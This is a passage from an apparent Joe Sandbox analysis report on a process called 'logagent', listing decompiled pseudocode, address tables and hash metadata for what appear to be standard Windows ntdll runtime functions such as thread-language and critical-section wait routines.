																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L051C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E051EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E051EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E051EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E051EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E051EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x52a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x52a7b84 = _t75;
						_t73 = E051CEB70(_t134, 0x52a7b60);
						if( *0x52a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E051CFF60( *0x52a7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                              0x051efab0
                                              0x051efab2
                                              0x051efab3
                                              0x051efab4
                                              0x051efabc
                                              0x051efac0
                                              0x051efb14
                                              0x051efb17
                                              0x051efac2
                                              0x051efac8
                                              0x051efacd
                                              0x051efad3
                                              0x051efad3
                                              0x051efadd
                                              0x051efb18
                                              0x051efb1b
                                              0x051efb1d
                                              0x051efb1e
                                              0x051efb1f
                                              0x051efb20
                                              0x051efb21
                                              0x051efb22
                                              0x051efb23
                                              0x051efb24
                                              0x051efb25
                                              0x051efb26
                                              0x051efb27
                                              0x051efb28
                                              0x051efb29
                                              0x051efb2a
                                              0x051efb2b
                                              0x051efb2c
                                              0x051efb2d
                                              0x051efb2e
                                              0x051efb2f
                                              0x051efb3a
                                              0x051efb3b
                                              0x051efb3e
                                              0x051efb41
                                              0x051efb44
                                              0x051efb47
                                              0x051efb4a
                                              0x051efb4d
                                              0x051efb53
                                              0x0522bdcb
                                              0x0522bdcb
                                              0x051efb59
                                              0x051efb5b
                                              0x051efb5b
                                              0x051efb5e
                                              0x0522bdd5
                                              0x0522bdd8
                                              0x00000000
                                              0x0522bdda
                                              0x00000000
                                              0x0522bdda
                                              0x051efb64
                                              0x051efb64
                                              0x051efb64
                                              0x051efb67
                                              0x051efb6e
                                              0x051efb70
                                              0x051efb72
                                              0x00000000
                                              0x051efb78
                                              0x051efb7a
                                              0x051efb7a
                                              0x051efb7d
                                              0x051efb80
                                              0x0522bddf
                                              0x0522bde1
                                              0x00000000
                                              0x0522bde3
                                              0x00000000
                                              0x0522bde3
                                              0x051efb86
                                              0x051efb86
                                              0x051efb86
                                              0x051efb8b
                                              0x051efb90
                                              0x051efb92
                                              0x051efb94
                                              0x051efb9a
                                              0x051efb9b
                                              0x051efba1
                                              0x0522bde8
                                              0x0522bdeb
                                              0x0522bded
                                              0x0522beb5
                                              0x0522beb5
                                              0x0522bebb
                                              0x0522bebd
                                              0x0522bec3
                                              0x0522bed2
                                              0x0522bedd
                                              0x0522bedd
                                              0x0522beed
                                              0x00000000
                                              0x0522bdf3
                                              0x0522bdfe
                                              0x0522be06
                                              0x0522be0b
                                              0x0522be0d
                                              0x0522be0f
                                              0x0522be14
                                              0x0522be19
                                              0x0522be20
                                              0x0522be25
                                              0x0522be27
                                              0x0522be35
                                              0x0522be39
                                              0x0522be46
                                              0x0522be4f
                                              0x0522be54
                                              0x0522be56
                                              0x0522bef8
                                              0x0522bef8
                                              0x00000000
                                              0x0522be5c
                                              0x0522be5c
                                              0x0522be60
                                              0x00000000
                                              0x0522be66
                                              0x0522be66
                                              0x0522be7f
                                              0x0522be84
                                              0x0522be87
                                              0x0522be89
                                              0x0522be8b
                                              0x0522be99
                                              0x0522be9d
                                              0x0522bea0
                                              0x0522beac
                                              0x0522beaf
                                              0x0522beb1
                                              0x0522beb3
                                              0x0522beb3
                                              0x00000000
                                              0x0522bea2
                                              0x0522bea2
                                              0x00000000
                                              0x0522bea2
                                              0x0522be8d
                                              0x0522be8d
                                              0x0522be92
                                              0x00000000
                                              0x0522be92
                                              0x0522be8b
                                              0x0522be60
                                              0x0522be3b
                                              0x0522be3b
                                              0x0522be3e
                                              0x00000000
                                              0x0522be40
                                              0x0522be40
                                              0x0522be44
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0522be44
                                              0x0522be3e
                                              0x0522be29
                                              0x0522be29
                                              0x00000000
                                              0x0522be29
                                              0x0522be27
                                              0x00000000
                                              0x051efba7
                                              0x051efba7
                                              0x051efbab
                                              0x0522bf02
                                              0x051efbb1
                                              0x051efbb1
                                              0x051efbb8
                                              0x051efbbd
                                              0x051efbbd
                                              0x051efbbf
                                              0x051efbbf
                                              0x051efbc5
                                              0x051efbcb
                                              0x051efbf8
                                              0x051efbf8
                                              0x051efbfa
                                              0x00000000
                                              0x051efc00
                                              0x051efc00
                                              0x051efc03
                                              0x00000000
                                              0x051efc09
                                              0x051efc09
                                              0x051efc0f
                                              0x051efc15
                                              0x051efc23
                                              0x051efc23
                                              0x051efc25
                                              0x051efc27
                                              0x051efc75
                                              0x051efc7c
                                              0x051efc84
                                              0x00000000
                                              0x051efc29
                                              0x051efc29
                                              0x051efc2d
                                              0x051efc30
                                              0x0522bf0f
                                              0x00000000
                                              0x051efc36
                                              0x051efc38
                                              0x051efc3b
                                              0x051efc41
                                              0x0522bf17
                                              0x0522bf19
                                              0x0522bf48
                                              0x0522bf4b
                                              0x00000000
                                              0x0522bf1b
                                              0x0522bf22
                                              0x0522bf24
                                              0x0522bf26
                                              0x00000000
                                              0x0522bf2c
                                              0x0522bf37
                                              0x0522bf39
                                              0x0522bf3b
                                              0x00000000
                                              0x0522bf41
                                              0x0522bf41
                                              0x0522bf41
                                              0x0522bf41
                                              0x0522bf45
                                              0x00000000
                                              0x0522bf45
                                              0x0522bf3b
                                              0x0522bf26
                                              0x00000000
                                              0x051efc47
                                              0x051efc47
                                              0x051efc49
                                              0x051efcb2
                                              0x051efcb4
                                              0x051efcb6
                                              0x051efcdc
                                              0x051efcdc
                                              0x00000000
                                              0x051efcb8
                                              0x051efcc3
                                              0x051efcc5
                                              0x051efcc7
                                              0x00000000
                                              0x051efcc9
                                              0x051efcc9
                                              0x051efccd
                                              0x00000000
                                              0x051efccd
                                              0x051efcc7
                                              0x00000000
                                              0x051efc4b
                                              0x051efc4b
                                              0x051efc4e
                                              0x051efc4e
                                              0x051efc51
                                              0x051efc51
                                              0x051efc54
                                              0x051efc5a
                                              0x051efc5c
                                              0x051efc5f
                                              0x051efc61
                                              0x051efc63
                                              0x051efc65
                                              0x051efc67
                                              0x051efc6e
                                              0x051efc72
                                              0x051efc72
                                              0x051efc72
                                              0x051efc72
                                              0x051efc67
                                              0x051efc61
                                              0x00000000
                                              0x051efc5a
                                              0x051efc49
                                              0x051efc41
                                              0x051efc30
                                              0x051efc27
                                              0x051efc03
                                              0x051efbcd
                                              0x051efbd3
                                              0x051efbd9
                                              0x051efbdc
                                              0x051efbde
                                              0x051efc99
                                              0x051efc9b
                                              0x051efc9d
                                              0x051efcd5
                                              0x051efcd5
                                              0x051efc89
                                              0x051efc89
                                              0x00000000
                                              0x051efc9f
                                              0x051efc9f
                                              0x051efca3
                                              0x00000000
                                              0x051efca3
                                              0x00000000
                                              0x051efbe4
                                              0x051efbe4
                                              0x051efbe4
                                              0x051efbe4
                                              0x051efbe9
                                              0x051efbf2
                                              0x00000000
                                              0x051efbf2
                                              0x051efbde
                                              0x051efbcb
                                              0x051efbab
                                              0x051efc8b
                                              0x051efc8b
                                              0x051efc8c
                                              0x051efb80
                                              0x051efb72
                                              0x051efb5e
                                              0x051efc8d
                                              0x051efc91
                                              0x051efadf
                                              0x051efadf
                                              0x051efae1
                                              0x051efae4
                                              0x051efae7
                                              0x051efaec
                                              0x051efaf8
                                              0x051efb00
                                              0x051efb07
                                              0x051efb0f
                                              0x051efb0f
                                              0x051efb07
                                              0x00000000
                                              0x051efaf8
                                              0x051efadd

                                              Strings
                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0522BE0F
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                              • API String ID: 0-865735534
                                              • Opcode ID: ef30dc7eb7c1d76c7a2e7cf17f5d6ab886319cf5c6d33155847eaa7d399b1371
                                              • Instruction ID: f1bba8e7fde89c0f4861390801143aaccec3ef9f73010c02503c6e9cc7f69440
                                              • Opcode Fuzzy Hash: ef30dc7eb7c1d76c7a2e7cf17f5d6ab886319cf5c6d33155847eaa7d399b1371
                                              • Instruction Fuzzy Hash: 22A12475B20A169BDB25CF64C454BBAB7A6FF48720F14496DEC0ADB681DB34D802CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 63%
                                              			E051B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x52a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x52a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E051F97C0();
				}
				if( *0x52a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x52a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E051E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E051D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0524FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E051F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E051EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0520DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x52a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x52a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E051F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E051F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E051D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E051D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05237016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0524FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x52a5350;
							if(_t109 != 0x52a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0524FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05245720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                              0x051b2d8a
                                              0x051b2d8a
                                              0x051b2d92
                                              0x051b2d96
                                              0x051b2d9e
                                              0x051b2da0
                                              0x051b2da3
                                              0x051b2da5
                                              0x051b2da8
                                              0x051b2dab
                                              0x051b2db2
                                              0x0520f9aa
                                              0x0520f9ab
                                              0x0520f9ae
                                              0x0520f9ae
                                              0x051b2db8
                                              0x051b2dc2
                                              0x0520f9b9
                                              0x0520f9be
                                              0x0520f9bf
                                              0x0520f9bf
                                              0x051b2dcf
                                              0x0520f9c9
                                              0x051b2dd5
                                              0x051b2dd5
                                              0x051b2dd5
                                              0x051b2dde
                                              0x051b2de1
                                              0x051b2e70
                                              0x051b2e72
                                              0x051b2e72
                                              0x051b2de7
                                              0x051b2deb
                                              0x051b2e7c
                                              0x051b2e83
                                              0x051b2e85
                                              0x051b2e8b
                                              0x051b2e8d
                                              0x051b2e92
                                              0x051b2e92
                                              0x051b2e85
                                              0x051b2df1
                                              0x051b2df7
                                              0x051b2df9
                                              0x051b2df9
                                              0x051b2dfc
                                              0x051b2dff
                                              0x051b2e02
                                              0x00000000
                                              0x051b2e05
                                              0x051b2e0c
                                              0x0520f9d9
                                              0x051b2e12
                                              0x051b2e12
                                              0x051b2e12
                                              0x051b2e1a
                                              0x0520f9e3
                                              0x0520f9e9
                                              0x0520f9f0
                                              0x0520f9f6
                                              0x0520f9f8
                                              0x0520f9f8
                                              0x0520f9f0
                                              0x051b2e23
                                              0x0520fa02
                                              0x0520fa03
                                              0x0520fa05
                                              0x0520fa06
                                              0x00000000
                                              0x051b2e29
                                              0x051b2e29
                                              0x051b2e2e
                                              0x051b2e34
                                              0x051b2e3e
                                              0x00000000
                                              0x00000000
                                              0x051b2e44
                                              0x051b2e47
                                              0x051b2e4d
                                              0x00000000
                                              0x00000000
                                              0x051b2e4f
                                              0x051b2e54
                                              0x00000000
                                              0x00000000
                                              0x051b2e5a
                                              0x051b2e5f
                                              0x051b2e9a
                                              0x051b2ea4
                                              0x051b2ea5
                                              0x051b2ea8
                                              0x051b2eaf
                                              0x051b2eb2
                                              0x051b2eb5
                                              0x0520fae9
                                              0x0520faeb
                                              0x0520faed
                                              0x0520faef
                                              0x0520faf7
                                              0x0520faf8
                                              0x0520fafd
                                              0x0520faff
                                              0x0520fb04
                                              0x0520fb04
                                              0x0520faff
                                              0x051b2ec0
                                              0x051b2ec4
                                              0x051b2ec6
                                              0x051b2ec8
                                              0x0520fb14
                                              0x0520fb18
                                              0x0520fb1e
                                              0x0520fb21
                                              0x0520fb21
                                              0x051b2ece
                                              0x051b2ece
                                              0x051b2ece
                                              0x051b2ed7
                                              0x051b2e61
                                              0x051b2e63
                                              0x0520fa6b
                                              0x0520fa71
                                              0x0520fa76
                                              0x0520fa78
                                              0x0520fa8a
                                              0x0520fa7a
                                              0x0520fa83
                                              0x0520fa83
                                              0x0520fa8f
                                              0x0520fa91
                                              0x0520fa97
                                              0x0520fa9d
                                              0x0520faa4
                                              0x0520faaa
                                              0x0520faaf
                                              0x0520fab1
                                              0x0520fac3
                                              0x0520fab3
                                              0x0520fabc
                                              0x0520fabc
                                              0x0520fac8
                                              0x0520facb
                                              0x0520fadf
                                              0x0520fadf
                                              0x0520facb
                                              0x0520faa4
                                              0x0520fa91
                                              0x051b2e6f
                                              0x051b2e6f
                                              0x051b2e5f
                                              0x0520fa13
                                              0x0520fa15
                                              0x0520fa17
                                              0x0520fa1f
                                              0x0520fa21
                                              0x0520fa22
                                              0x0520fa25
                                              0x0520fa28
                                              0x0520fa2f
                                              0x0520fa2f
                                              0x0520fa2a
                                              0x0520fa2a
                                              0x0520fa2a
                                              0x0520fa31
                                              0x0520fa34
                                              0x0520fa36
                                              0x0520fa3c
                                              0x0520fa3e
                                              0x0520fa41
                                              0x0520fa43
                                              0x0520fa45
                                              0x0520fa45
                                              0x0520fa41
                                              0x0520fa3c
                                              0x0520fa4a
                                              0x0520fa4f
                                              0x0520fa51
                                              0x0520fa53
                                              0x0520fa56
                                              0x0520fa5b
                                              0x0520fa5e
                                              0x00000000
                                              0x0520fa5e
                                              0x051b2e23

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Re-Waiting
                                              • API String ID: 0-316354757
                                              • Opcode ID: e3e81a7a4baf0df8520eb54f2867d4ec7d5fe83aa74ad1fd576fef4a3bb38541
                                              • Instruction ID: 3b2419e378b648ebd74645c2253be4c49b63a3bd7e02644377fc11b9ca31f042
                                              • Opcode Fuzzy Hash: e3e81a7a4baf0df8520eb54f2867d4ec7d5fe83aa74ad1fd576fef4a3bb38541
                                              • Instruction Fuzzy Hash: 48617635B55605AFEB31DF68C984BBEB7B2FF44310F140269E826972C2C7B4A944C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05280EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E05280EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0527FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05281074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E051F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0527A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0527A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x52a8b04 >> 0x14) + (_v44 -  *0x52a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E051D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0527138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E051D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0526FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x52a8724 & 0x00000008) != 0) {
						E052752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E052815B5(0x52a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                              0x05280eb7
                                              0x05280eb9
                                              0x05280ec0
                                              0x05280ec2
                                              0x05280ecd
                                              0x0528105b
                                              0x0528105b
                                              0x05281061
                                              0x05281066
                                              0x05281066
                                              0x0528106b
                                              0x05281073
                                              0x05281073
                                              0x05280ed3
                                              0x05280ed6
                                              0x05280edc
                                              0x05280ee0
                                              0x05280ee7
                                              0x05280ef0
                                              0x05280ef5
                                              0x05280efa
                                              0x05280efc
                                              0x05280efd
                                              0x05280f03
                                              0x05280f04
                                              0x05280f06
                                              0x05280f07
                                              0x05280f09
                                              0x05280f0e
                                              0x05280f14
                                              0x05280f23
                                              0x05280f2d
                                              0x05280f34
                                              0x05280f34
                                              0x05280f14
                                              0x05280f52
                                              0x00000000
                                              0x00000000
                                              0x05280f58
                                              0x05280f73
                                              0x05280f74
                                              0x05280f79
                                              0x05280f7d
                                              0x05280f80
                                              0x05280f86
                                              0x05280fab
                                              0x05280fb5
                                              0x05280fc6
                                              0x05280fd1
                                              0x05280fe3
                                              0x05280fd3
                                              0x05280fdc
                                              0x05280fdc
                                              0x05280feb
                                              0x05281009
                                              0x05281009
                                              0x05281015
                                              0x05281027
                                              0x05281017
                                              0x05281020
                                              0x05281020
                                              0x0528102f
                                              0x0528103c
                                              0x0528103c
                                              0x05281048
                                              0x05281050
                                              0x05281050
                                              0x05281055
                                              0x00000000
                                              0x05281055
                                              0x05280f88
                                              0x05280f9e
                                              0x05280fa2
                                              0x05280fa9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05280fa9
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 585d98bc645d9455711f365996d9e897570e5322f1451d11eb575ba6ed71a95b
                                              • Instruction ID: fe2b1f6760a36707c6048340f65d1caaa43af223cdf3905c9d6aeb4565fe4d13
                                              • Opcode Fuzzy Hash: 585d98bc645d9455711f365996d9e897570e5322f1451d11eb575ba6ed71a95b
                                              • Instruction Fuzzy Hash: CA51AE712193429BD315EF58D888B2BB7E5FF84304F04492CF996972D1DB70E90ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E051EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E051D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E051F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
